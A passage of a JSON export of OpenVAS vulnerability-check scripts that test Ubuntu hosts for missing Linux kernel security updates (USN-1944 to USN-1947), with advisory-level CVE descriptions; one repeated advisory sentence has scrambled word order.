script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"1944-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1944-1/\");\n script_tag(name: \"summary\" , value: \"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-generic\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-highbank\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-omap\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-powerpc-smp\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-powerpc64-smp\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:1361412562310841546", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841546", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1945-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1945_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1945-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841546\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:41:44 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\",\n \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1945-1\");\n\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"A denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service by creating a\nlarge number of files with names that have the same CRC32 hash value.\n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service (prevent file\ncreation) for a victim, by creating a file with a specific CRC32C hash\nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw to\nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"1945-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1945-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-232-omap4\", ver:\"3.5.0-232.48\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:1361412562310841547", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841547", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1946", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1946.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1946\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841547\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:43:52 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\",\n \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1946\");\n\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 13.04\");\n script_tag(name:\"insight\", value:\"A denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service by creating a\nlarge number of files with names that have the same CRC32 hash value.\n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service (prevent file\ncreation) for a victim, by creating a file with a specific CRC32C hash\nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw to\nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"1946\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1946/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU13\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU13.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-232-omap4\", ver:\"3.5.0-232.48\", rls:\"UBUNTU13.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-02-06T13:09:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "Check for the Version of linux-lts-quantal", "modified": "2018-02-05T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:841552", "href": "http://plugins.openvas.org/nasl.php?oid=841552", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1947-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1947_1.nasl 8672 2018-02-05 16:39:18Z teissa $\n#\n# Ubuntu Update for linux-lts-quantal USN-1947-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841552);\n script_version(\"$Revision: 8672 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 17:39:18 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:49:08 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\",\n \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1947-1\");\n\n tag_insight = \"A denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service by creating a\nlarge number of files with names that have the same CRC32 hash value.\n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service (prevent file\ncreation) for a victim, by creating a file with a specific CRC32C hash\nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows specified to be run as root. A local could exploit this flaw to run\ncommands as root when using the perf tool. user could exploit this\n(CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\";\n\n tag_affected = \"linux-lts-quantal on Ubuntu 12.04 LTS\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"1947-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1947-1/\");\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-lts-quantal\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-generic\", ver:\"3.5.0-40.62~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:09:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "Check for the Version of linux-ti-omap4", "modified": "2018-01-17T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:841547", "href": "http://plugins.openvas.org/nasl.php?oid=841547", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1946", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1946.nasl 8448 2018-01-17 16:18:06Z teissa $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1946\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841547);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:43:52 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\",\n \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1946\");\n\n tag_insight = \"A denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service by creating a\nlarge number of files with names that have the same CRC32 hash value.\n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service (prevent file\ncreation) for a victim, by creating a file with a specific CRC32C hash\nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw to\nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\";\n\n tag_affected = \"linux-ti-omap4 on Ubuntu 13.04\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"1946\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1946/\");\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-ti-omap4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU13.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-232-omap4\", ver:\"3.5.0-232.48\", rls:\"UBUNTU13.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:1361412562310841552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841552", "type": "openvas", "title": "Ubuntu Update for linux-lts-quantal USN-1947-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1947_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-quantal USN-1947-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841552\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:49:08 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\",\n \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-quantal USN-1947-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-quantal on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"A denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service by creating a\nlarge number of files with names that have the same CRC32 hash value.\n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service (prevent file\ncreation) for a victim, by creating a file with a specific CRC32C hash\nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows specified to be run as root. A local could exploit this flaw to run\ncommands as root when using the perf tool. user could exploit this\n(CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"1947-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1947-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-quantal'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-generic\", ver:\"3.5.0-40.62~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:1361412562310841542", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841542", "type": "openvas", "title": "Ubuntu Update for linux USN-1944-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1944_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1944-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will 